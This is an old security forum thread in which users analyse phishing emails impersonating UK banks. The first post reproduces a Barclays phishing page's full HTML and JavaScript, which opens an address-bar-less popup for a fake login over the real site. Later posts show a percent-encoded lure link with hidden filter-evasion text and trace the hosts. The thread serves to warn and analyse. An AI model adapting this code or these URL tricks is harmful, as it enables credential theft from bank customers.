Just got this Barclays Phishing email


Author: browolf PostPosted: Fri Feb 27, 2004 12:14 pm    Post subject: Just got this Barclays Phishing email
    ----
it basically redirects to the real barclays page with a fake popup.

I managed to get the page before it redirects using wget.

thought some might be interested to see how it works. (this isn't an invitation to craft your own phishing scams)

Code:

<html>
<head>
<title>Barclays</title>
 
<script LANGUAGE="JavaScript">

// Browser Detection
// Every flag below comes from legacy feature probes (document.layers,
// document.all) and substring matches on navigator strings. They are
// assigned without var, so each one becomes an implicit global.
isMac = (navigator.appVersion.indexOf("Mac")!=-1) ? true : false;
// A present document.layers is treated as Netscape 4; a present document.all
// is treated as "IE 4 or later".
NS4 = (document.layers) ? true : false;
IEmac = ((document.all)&&(isMac)) ? true : false;
IE4plus = (document.all) ? true : false;
IE4 = ((document.all)&&(navigator.appVersion.indexOf("MSIE 4.")!=-1)) ? true : false;
IE5 = ((document.all)&&(navigator.appVersion.indexOf("MSIE 5.")!=-1)) ? true : false;

IE6 = ((document.all)&&(navigator.appVersion.indexOf("MSIE 6.")!=-1)) ? true : false;
ver4 = (NS4 || IE4plus) ? true : false;
NS6 = (!document.layers) && (navigator.userAgent.indexOf('Netscape')!=-1)?true:false;

IE5plus = IE5 || IE6;
IEMajor = 0;

if (IE4plus)
{
   // Extract the major version from "MSIE N." — "MSIE " is five characters,
   // so the number runs from start+5 up to the first "." after it.
   // parseInt is called without a radix.
   var start = navigator.appVersion.indexOf("MSIE");
   var end = navigator.appVersion.indexOf(".",start);
   IEMajor = parseInt(navigator.appVersion.substring(start+5,end));
   IE5plus = (IEMajor>=5) ? true : false;
}

// Body onload utility (supports multiple onload functions)
// Queue of functions to run on window load; filled by SafeAddOnload and
// drained in order by SafeOnload.
var gSafeOnload = new Array();
// Registers f to run on window load without clobbering a handler that is
// already installed. The first time a foreign handler is found it is moved
// into gSafeOnload[0] and SafeOnload takes over window.onload.
//   f: a zero-argument function
function SafeAddOnload(f)
{
   if (IEmac && IE4)  // IE 4.5 blows out on testing window.onload
   {
      window.onload = SafeOnload;
      gSafeOnload[gSafeOnload.length] = f;
   }
   else if  (window.onload)
   {
      if (window.onload != SafeOnload)
      {
         // Preserve whatever was there and chain it in front of our queue.
         gSafeOnload[0] = window.onload;
         window.onload = SafeOnload;
      }      
      gSafeOnload[gSafeOnload.length] = f;
   }
   else
      window.onload = f;   // nothing installed yet: bind f directly, bypassing the queue
}
// Shared onload handler: calls every queued function in registration order.
// No error handling — an exception in one entry stops the remaining ones.
function SafeOnload()
{
   for (var i=0;i<gSafeOnload.length;i++)
      gSafeOnload[i]();
}

// Loose integer test: true when parseInt can pull a number off the front of
// numIn. Because parseInt is used (no radix), strings such as "12abc" pass
// and "0x1f"-style input is parsed as hex in some engines.
//   numIn: the string to test (typically the PUWCount cookie value)
function isInt(numIn)
{
   var checknum = parseInt(numIn);
   return !isNaN(checknum);
}

// Installed on the PopupWindow object as Init. If the cookie-based throttle
// allows it, schedules the popup after showDelay milliseconds.
// Note the string form of setTimeout: the argument is evaluated as code,
// and it always targets the global gPopupWindow rather than `this`.
function PUW_Init()
{
   if (gPopupWindow.CheckFrequency())
   {
      setTimeout("gPopupWindow.Show()",gPopupWindow.showDelay);
   }
}

// Installed on the PopupWindow object as Show. Opens this.url in a new window
// whose chrome is switched on/off from the object's flags. With the
// PopupWindow defaults (locationbar = false) the feature string contains
// "location=no", so the popup shows no address bar and nothing on screen
// reveals which host actually serves this.url.
function PUW_Show()
{
   var settings = "width="+this.width+",height="+this.height+",top="+this.top+",left="+this.left+",";
   settings += "scrollbars=" + ((this.scrollbars) ? "yes," : "no,");
   settings += "toolbar=" + ((this.toolbar) ? "yes," : "no,");
   settings += "location=" + ((this.locationbar) ? "yes," : "no,");
   settings += "menubar=" + ((this.menubar) ? "yes," : "no,");
   settings += "status=" + ((this.statusbar) ? "yes," : "no,");
   settings += "resizable=" + ((this.resizable) ? "yes" : "no");
   
   // The window handle is captured but never used afterwards.
   var newWin = window.open(this.url,this.name,settings);
   
   // With ontop = false the opener takes focus back, leaving the popup behind
   // it; with ontop = true no focus is returned to the opener.
   if (! this.ontop)
      window.focus();
}

// Installed on the PopupWindow object as CheckFrequency. Decides whether the
// popup may be shown this time, throttled by a "PUWCount" cookie that holds
// the remaining count. Returns true to show, false to suppress.
//   frequency == 0 : never show
//   frequency  < 0 : always show, cookie untouched
//   frequency  > 0 : show at most `frequency` times per `renew` hours
function PUW_CheckFrequency()
{
   var shouldShow = this.frequency != 0;
   if (this.frequency > 0)
   {
      var allCookies = document.cookie;
      // Plain substring search: a cookie whose name merely ends in
      // "PUWCount" would also match here.
      var start = allCookies.indexOf("PUWCount=");
      if (start >= 0)
      {
         var end = allCookies.indexOf(";",start);
         if (end < 0)
            end = allCookies.length;
         // "PUWCount=" is nine characters, so the value begins at start+9.
         var freqStr = allCookies.substring(start+9,end);
         if (isInt(freqStr))
            this.frequency = parseInt(freqStr);   // stored count overrides the default
      }

      if (this.frequency>0)
         this.frequency--;
      else
         shouldShow = false;
         
      // Write the decremented count back; renew is in hours (60 * 60000 ms).
      // No path or domain attribute is set, so browser defaults apply.
      var exp = new Date();
      exp.setTime(exp.getTime()+this.renew*60*60000);
      document.cookie = "PUWCount="+this.frequency+ "; expires=" + exp.toGMTString();
   }
   
   return shouldShow;
}


// Constructor for the popup descriptor used by PUW_Init/PUW_Show/
// PUW_CheckFrequency.
//   url:    what the popup loads (passed to window.open unchanged)
//   width:  IGNORED — the body hard-codes 800 below
//   height: IGNORED — the body hard-codes 633 below
// The defaults hide the toolbar, menubar, status bar and, most relevantly,
// the location bar, so the popup appears without an address.
function PopupWindow(url,width,height)
{
   this.width = 800;
   this.height = 633;
   this.top = 70
   this.left = 50
   this.name = "mypopupwin";
   this.url = url;
   this.showDelay = 2;   // milliseconds, used by setTimeout in PUW_Init
   this.frequency = 200; // how many times show per renewal time period
   this.renew = 1; // renew showing every x hours
   this.scrollbars= true;
   this.toolbar= false;
   this.statusbar= false;
   this.resizable = true;
   this.locationbar = false;
   this.menubar = false;
   this.ontop = false;
   

   
   // Methods are attached per instance rather than via the prototype.
   this.Init = PUW_Init;
   this.Show = PUW_Show;
   this.CheckFrequency = PUW_CheckFrequency;
}

// Onload entry point: kicks off the global popup. gPopupWindow must have been
// assigned by the time the load event fires (it is, further down the script).
function PUWStart()
{
   gPopupWindow.Init();
}

// Startup wiring. The onload hook is registered before gPopupWindow exists;
// that works only because PUWStart dereferences it when the load event
// fires, after the assignment below has run.
SafeAddOnload(PUWStart);

// "1logon00.htm" is a relative URL, so the popup content is fetched from the
// same host that served this page — not from the bank. The 350x150 size
// arguments are discarded by the constructor (it fixes 800x633).
gPopupWindow = new PopupWindow("1logon00.htm", 350, 150);
gPopupWindow.toolbar = false;
gPopupWindow.statusbar = true;   // status bar on; locationbar stays false, so still no address bar
gPopupWindow.resizable = true;
gPopupWindow.ontop = true;       // opener is not re-focused after window.open (see PUW_Show)

</script>
 </head>

<body bgcolor="#FFFFFF" text="#000000">

<!-- The visible page is empty. The 0-second meta refresh below sends the
     main window to the genuine www.barclays.co.uk, so the site the victim
     sees underneath is real; only the popup opened by the script above
     (1logon00.htm, served from this host) is not. The tag sits in the body
     rather than the head; the poster reports that browsers still honour it. -->
<META HTTP-EQUIV="Refresh" CONTENT="0; url=http://www.barclays.co.uk/"><div align="center">
  <p>&nbsp;</p>
</div>

</body>
</html>


the url in the email is
http://www.personal.barclays.co.ukgotolpfsplb@142.165.231.19:4925/b/index.htm

in the source of the popup clues are:

these funny tags
<!-- Vignette V/5 Thu Feb 26 13:36:14 2004 -->

the form is posted to
<form method="POST" action="12355600.php">

**MOD EDIT**

Browolf - I feel this topic should be more prominent, have made it a sticky - regards

Author: TinTin PostPosted: Sun Mar 07, 2004 11:49 am    Post subject: topic
    ----
You're absolutely right

Here is the original as posted here https://ibank.barclays.co.uk/olb/q/Welcome.do

SECURITY ALERT: Please read this important message
We are aware that some customers are receiving a message from an email address posing as Barclays Bank.

Instructions on the email advise you to follow a link to what appears to be a Barclays website where you are prompted to enter your personal details.
Barclays is in no way involved with this scam email and the website does not belong to us.

Barclays does not send any emails to customers requesting your security or any other confidential information. Please do not reply to any such emails or follow any links to websites claiming to be Barclays Online Banking.

ALWAYS check the website address at the top of your screen starts with 'https'. This lets you know the site is secure.
Please read our latest information and advice on Online Security


Last edited by TinTin on Sat Dec 17, 2005 7:59 pm; edited 1 time in total

Author: ZCorker PostPosted: Sun Mar 07, 2004 8:34 pm    Post subject: Wget
    ----
May I ask what steps you took to capture the page before it redirects? More a point of curiosity. It might also help me in better understanding how to circumvent authorized redirects which can be a real problem.

I haven't tried wget, but looks like this is a program I should take a look at.

Thanks,
zcorker
<rjs4you(at)netzero.net>

Author: browolf PostPosted: Fri Apr 30, 2004 2:43 pm    Post subject:
    ----
using wget gets around this redirect because it is a client-side effect (a meta refresh inside the page) that wget doesn't interpret.

the windows port of wget is a dos program that just saves the file. no html interpretation is done.

all the phishing scams i've seen involve a fake popup and redirection to the real site. the ones i've seen lately have been running on compromised hosts.

if you use a proxy you have to set it as an environment variable before using wget

c:\> set http_proxy=myproxy:8080

Author: Anub!$Location: Computer Chair PostPosted: Fri Apr 30, 2004 3:02 pm    Post subject: Just got this Barclays Phishing email
    ----
A man has been arrested for a case like this, it may be the same one.

Probably is actually.

Here is some more info:

http://www.sophos.com/spaminfo/articles/phishingbust.html

Author: browolf PostPosted: Fri Apr 30, 2004 3:23 pm    Post subject:
    ----
perhaps but the above code is almost identical to a barclays scam i got the other day. which i suspect is a much more sophisticated operation.

see this thread: http://www.security-forums.com/forum/viewtopic.php?t=13539&highlight=

in fact I just checked now and the code is identical, even the comments are the same.

whoever is running this has been doing so since Feb, clearly just moving the code around. At the moment the domain on the latest one is registered at
YESNIC CO. LTD. [www.yesnic.com]

a coincidence there, the site atm is running thru a korean host. yesnic have a korean version of their page.

yesnic are no stranger to controversy; after a quick google they've been involved in several domain name disputes involving korean citizens.

Author: browolf PostPosted: Wed May 05, 2004 3:31 pm    Post subject:
    ----
just got a nationwide phishing email

Code:

<!-- The href's hostname is percent-encoded after the "www.nationwide.co.uk"
     prefix; decoded, the link reads www.nationwide.co.uk.userset.net:4903/nw/index.htm
     (see the decoded form further down), i.e. the bank's name is just a
     subdomain label of userset.net. The clickable body is an inline image
     (cid:) rather than text. The trailing <font> line is near-white (#FFFFF4)
     text, practically invisible on a white mail background — presumably
     filler aimed at mail filters; TODO confirm. -->
<html><body><p> <a href="http://www.nationwide.co.uk%2E%75%73%65%72%73%65%74%2E%6E%65%74:%34%39%30%33/%6E%77/%69%6E%64%65%78%2E%68%74%6D"> <img src="cid:6C0F0035.58BDF68E.93FFA922.DF54F0DF_csseditor" ALT="" border="0">
</a>
</p><p>
<font color="#FFFFF4">Romeo MGM Dr. Dree in 1849 Sure</font>
</p></body></html>


the obfuscated domain is almost the same as the barclays one

http://www.nationwide.co.uk.userset.net:4903/nw/index.htm

the userset domain seems to have moved away from the korean school

the url without the port and file now gives a
ERROR
The requested URL could not be retrieved

While trying to retrieve the URL: http://www.personal.barclays.co.uk.userset.net/
The following error was encountered:
* Connection Failed
The system returned:
(111) Connection refused

but a traceroute leads to
Quote:

traceroute to www.nationwide.co.uk.userset.net (65.24.44.40), 30 hops max, 40 byte packets
3 ldn-b4-feth4-1.telia.net (213.248.75.65) 0.314 ms 0.246 ms 0.167 ms
4 ldn-bb2-pos5-2-0.telia.net (213.248.65.101) 0.370 ms 0.427 ms 0.417 ms
5 ldn-b2-pos8-0.telia.net (213.248.74.10) 1.532 ms 0.692 ms 0.495 ms
6 aol-01135-ldn-b2.telia.net (213.248.75.70) 0.731 ms 0.542 ms 0.378 ms
7 bb2-loh-P6-0.atdn.net (66.185.136.242) 0.698 ms 0.640 ms 0.629 ms
8 bb2-nye-P5-0.atdn.net (66.185.152.140) 72.528 ms 72.729 ms 72.507 ms
9 bb1-nye-P2-0.atdn.net (66.185.153.20) 72.658 ms 72.496 ms 72.735 ms
10 bb2-ash-P10-0.atdn.net (66.185.152.87) 73.843 ms 105.597 ms 73.648 ms
11 bb2-cin-P3-0.atdn.net (66.185.153.61) 91.878 ms 91.722 ms 91.726 ms
12 pop1-cin-P1-0.atdn.net (66.185.133.3) 92.169 ms 92.106 ms 92.333 ms
13 RR-Cincinnati.atdn.net (66.185.133.10) 92.346 ms 92.664 ms 92.481 ms
14 pos13-0.clmboh1-rtr3.columbus.rr.com (65.25.128.230) 95.299 ms 95.386 ms 95.394 ms
15 srp0-0.clmboh1-rtr1.columbus.rr.com (65.25.129.97) 95.720 ms 96.052 ms 95.707 ms
16 srp1-0.nwrmoh1-ubr1.columbus.rr.com (24.95.81.166) 96.788 ms 96.681 ms 96.834 ms
17 dhcp065-024-044-040.columbus.rr.com (65.24.44.40) 101.174 ms 101.851 ms 102.388 ms



we'll soon have that shut down Very Happy

Author: browolf PostPosted: Thu May 06, 2004 4:49 pm    Post subject:
    ----
just got a halifax one.

pointing at

www.halifax-online.co.uk.userset.net:4903/b/index.htm

but it doesn't seem to resolve properly.

in fact all the traceroutes seem to get as far as
11 94 125 109 195.60.31.254 telehouse-gw-1.power.net.uk

then can't get any further, just timeouts..hmm how odd. wonder what that means. perhaps it's been terminated already. heh it's getting bad for them when the scams are down before the victims receive the email.

Author: carl04 PostPosted: Wed Jul 07, 2004 8:42 pm    Post subject: .
    ----
what is email phishing?

Author: squidlyLocation: Umm.. I dont know.. somewhere PostPosted: Thu Jul 08, 2004 10:34 pm    Post subject:
    ----
carl04 wrote:
what is email phishing?


phishing is when someone tries to make an email look like it comes from someplace you are supposed to trust, such as your bank or your ISP, in order to get you to give them some sensitive info.

Author: browolf PostPosted: Tue Nov 29, 2005 11:01 pm    Post subject:
    ----
talking of barclays phishing I've been getting an awful lot of these recently in my bt mail and at work. i have my bt mail forwarded to gmail which catches 95% of the spam. it seems to be distinguishing between spam and phish as a warning appears with the phish. well some of them. it warns on the barclays ones but not the halifax or lloyds ones. Got 6 today in total. 4 of them all came from different compromised hosts but with the similarities of the port (680) and the path (/rock/x) where x is a single letter representing the bank e.g. l for lloyds, h for halifax. another one used port 780 instead.






